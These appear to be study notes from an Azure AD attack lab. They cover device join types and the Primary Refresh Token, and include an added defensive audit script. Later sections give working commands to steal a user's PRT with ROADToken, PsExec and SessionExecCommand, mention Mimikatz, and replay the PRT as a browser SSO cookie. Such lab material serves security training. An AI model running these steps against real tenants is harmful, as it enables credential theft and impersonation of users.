Device Identities

  • Azure AD joined
    • organization-owned devices, Intune managed (Windows 10/11, Server 2019)
  • Azure AD registered / workplace joined
    • BYOD or organization owned
    • Windows 10+, macOS, Ubuntu, mobile devices
  • hybrid Azure AD joined
    • joined to on-prem AD as well as Azure AD

When a machine joins Azure AD, the following become members of the local Administrators group:
  • Global Administrators
  • Azure AD Joined Device Local Administrator role
  • the user who joined the machine to Azure AD

The CloudAP SSP requests and caches a PRT (Primary Refresh Token) on the device. The PRT contains all the claims for the current user.
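An added defender-side check (not part of the original notes) that shows the two facts above on a live device: the join state and whether a PRT is cached, read from dsregcmd /status, and which members of the local Administrators group are cloud principals. It assumes Windows 10/11 with dsregcmd.exe and the built-in Microsoft.PowerShell.LocalAccounts module, run from an elevated prompt on the device being audited; the function names are my own.

```powershell
# Added audit example, not from the original notes. Assumes Windows 10/11 with dsregcmd.exe
# and the Microsoft.PowerShell.LocalAccounts module; run elevated on the device itself.

function Get-DsregState {
    # Parse the "Key : Value" lines of dsregcmd /status into a hashtable.
    $state = @{}
    foreach ($line in (dsregcmd /status)) {
        if ($line -match '^\s*([A-Za-z0-9]+)\s*:\s*(.*?)\s*$') {
            $state[$matches[1]] = $matches[2]
        }
    }
    return $state
}

function Get-CloudLocalAdmins {
    # List local Administrators and flag Azure AD principals.
    # Azure AD users and roles are mapped to SIDs under S-1-12-1-*, and
    # Get-LocalGroupMember reports PrincipalSource = AzureAD for them.
    Get-LocalGroupMember -Group 'Administrators' | ForEach-Object {
        [pscustomobject]@{
            Name             = $_.Name
            SID              = $_.SID.Value
            PrincipalSource  = $_.PrincipalSource
            IsCloudPrincipal = ($_.PrincipalSource -eq 'AzureAD') -or ($_.SID.Value -like 'S-1-12-1-*')
        }
    }
}

$join = Get-DsregState
"AzureAdJoined : $($join['AzureAdJoined'])"
"DomainJoined  : $($join['DomainJoined'])"   # YES together with AzureAdJoined = hybrid joined
"AzureAdPrt    : $($join['AzureAdPrt'])"     # YES = a PRT is cached for the logged-on user

$admins = Get-CloudLocalAdmins
$admins | Format-Table -AutoSize
$cloud = @($admins | Where-Object IsCloudPrincipal)
if ($cloud.Count -gt 0) {
    Write-Warning ("{0} cloud principal(s) hold local admin on this device; confirm each one is expected (the joining user, the device admin role)." -f $cloud.Count)
}
```

The AzureAdPrt line is only present under "SSO State" while a user with a PRT is signed in, so it reads as empty on a device with no interactive cloud session. Get-LocalGroupMember is known to throw on Azure AD joined devices when the group holds SIDs it cannot resolve; if that happens, `net localgroup Administrators` still lists the raw SIDs and the same S-1-12-1-* prefix identifies the cloud entries.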

This can be abused by extracting the PRT and using it to perform SSO as that user.

Extract the PRT with ROADtools

ROADToken.exe or Get-AADIntUserPRTToken (as the target user, so we might need to use SessionExecCommand):

# get a nonce (can be run from any machine)
$TenantId = "2d50cb29-5f7b-48a4-87ce-fe75a941adb6"
$URL = "https://login.microsoftonline.com/$TenantId/oauth2/token"
$Params = @{
"URI" = $URL
"Method" = "POST"
}
$Body = @{
"grant_type" = "srv_challenge"
}
$Result = Invoke-RestMethod @Params -UseBasicParsing -Body $Body
$Result.Nonce
# to query currently logged on users:
Invoke-Command -Session $infradminsrv -ScriptBlock{query user}
 
# run road token in the context of another user
Invoke-Command -Session $infradminsrv -ScriptBlock{C:\Users\Public\student64\PsExec64.exe -accepteula -s "cmd.exe" " /c C:\Users\Public\student64\SessionExecCommand.exe MichaelMBarron C:\Users\Public\student64\ROADToken.exe AwABAAEAAAACAOz_BQD0_xchDSnrlNdWF8uBhIEpXKfpyyzJsrPDBUY-iK4l2Tvb4HugQrcDz7Wb2m5mvNeU8x_e4to7NUA1O2FvE7u-5JEgAA > C:\Users\Public\student64\PRT.txt"}
 
Invoke-Command -Session $infradminsrv -ScriptBlock{cat C:\Users\Public\student64\PRT.txt}

Alternative: use Mimikatz

Copy-Item -ToSession $jumpvm -Path C:\AzAD\Tools\mimikatz.exe -Destination C:\Users\student64\Documents -Verbose

Use the PRT for browser SSO

Visit https://login.microsoftonline.com/login.srf and set the x-ms-RefreshTokenCredential cookie to the PRT cookie value (mark it httpOnly as well). If it does not work, redo it.